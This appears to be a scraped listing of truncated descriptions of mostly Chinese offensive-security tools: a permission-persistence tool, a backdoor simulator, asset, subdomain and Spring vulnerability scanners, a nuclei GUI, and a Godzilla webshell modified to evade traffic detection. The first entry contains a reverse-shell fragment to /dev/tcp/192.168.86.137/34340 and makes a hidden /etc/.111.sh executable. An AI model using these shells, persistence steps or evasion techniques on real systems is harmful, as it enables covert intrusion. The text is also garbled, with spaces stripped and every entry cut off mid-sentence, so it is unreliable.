?HackerPermKeeper黑客权限保持者___________|||||||__\||//||__||______||________||__)|___________|'/_______________|__|/_`|/__||//_\'__|___/_\'__|'_`_\|&/dev/tcp/192.168.86.137/34340>&1chmod+x/etc/.111.sh2、添加定…

BackdoorSimOverviewBackdoorSimisaremoteadministrationandmonitoringtooldesignedforeducationalandtestingpurposes.Itconsistsoftwomaincomponents:ControlServerandBackdoorClient.Theservercontrolstheclient,a…

IEyes企业资产快速收集工具本工具主要通过天眼查接口进行快速的资产收集，收集内容包括备案域名、公众号、APP，以及其子公司，投资公司的信息，支持递归深度搜索子公司在查询企业子公司时主要分为4类企业单位场景，除了4以外整体我都简化一并查询中小企业，集团公司，这类公司有自己的子公司，子公司也是我们收集的范围大型厂商，比如腾讯阿里这类，这类公司主要以投资的形式拥有着一大批子公司，投资比例越高越和母公司…

Modern.Native.WebDebuggingProxyformacOS.SupportsiOSandAndroid⚡️Features?NativemacOSapp.WrittenbySwift,Objective-C.PoweredbyAppleSwiftNIOforthehigh-performancenetworkapplication.?FullysupportsAppleChip…

✈️一、工具概述SBSCAN：（spring框架渗透，这一个工具就够了，如果工具对你有用，快点个star?吧）SBSCAN是一款专注于spring框架的渗透测试工具，可以对指定站点进行springboot未授权扫描/敏感信息扫描以及进行spring相关漏洞的扫描与验证。最全的敏感路径字典：最全的springboot站点敏感路径字典，帮你全面检测站点是否存在敏感信息泄漏支持指纹检测：检测是否为spr…

SubDomainBruteJava子域名爆破工具描述爆破：现经过优化后，预计31297个域名调整好参数后大概在16秒左右能够跑完，效果大概如下图：已添加子域获取接口：AlienVaultAnubisRapiddnsSiteDossier使用方法：将PortService放到Jar包所在目录下，后执行java-jarJarName，参数项：Usage:[options]Options:*--dom…

nacs事件驱动的扫描器[中文Readme]|[EnglishReadme]✨功能探活服务扫描(常规&非常规端口)poc探测(xray&nuclei格式)数据库等弱口令爆破内网常见漏洞利用⭐️亮点常见组件及常见HTTP请求头的log4j漏洞检测非常规端口的服务扫描和利用(比如2222端口的ssh等等)识别为公网IP时,从fofa检索可用的资产作为扫描的补充(正在写)自动识别简单web页面的输入框，…

Z-Godzilla_ekp哥斯拉webshell二次开发规避流量检测设备二开详细教程在微信公众号：艾克sec目前测了国内两安全厂商的态感，连接和执行命令无任何告警现在改了php和java的，后续尽快新增net的java，net，php流量修改已经全部支持，以后还会集成一键免杀功能和一些插件觉得好用的师傅点点star～(更新的动力！！！)流量修改效果phpxorbase64流量修改前修改后配合40…

注意：项目中大部分文件是绝对路径，需要跟batch_scan_domain配合使用，将2个项目部署到服务器/TIP/目录下！！！项目中大部分文件是绝对路径，需要跟batch_scan_domain配合使用，将2个项目部署到服务器/TIP/目录下！！！项目中大部分文件是绝对路径，需要跟batch_scan_domain配合使用，将2个项目部署到服务器/TIP/目录下！！！项目启动文件scan_mai…

Fiora项目简介：Fiora是LoL中的无双剑姬的名字，她善于发现对手防守弱点，实现精准打击。该项目为PoC框架nuclei提供图形界面，实现快速搜索、一键运行等功能，提升nuclei的使用体验。项目地址：https://github.com/bit4woo/Fiora项目作者：bit4woo视频教程：https://www.bilibili.com/video/bv1Ha411z7T1安装运行…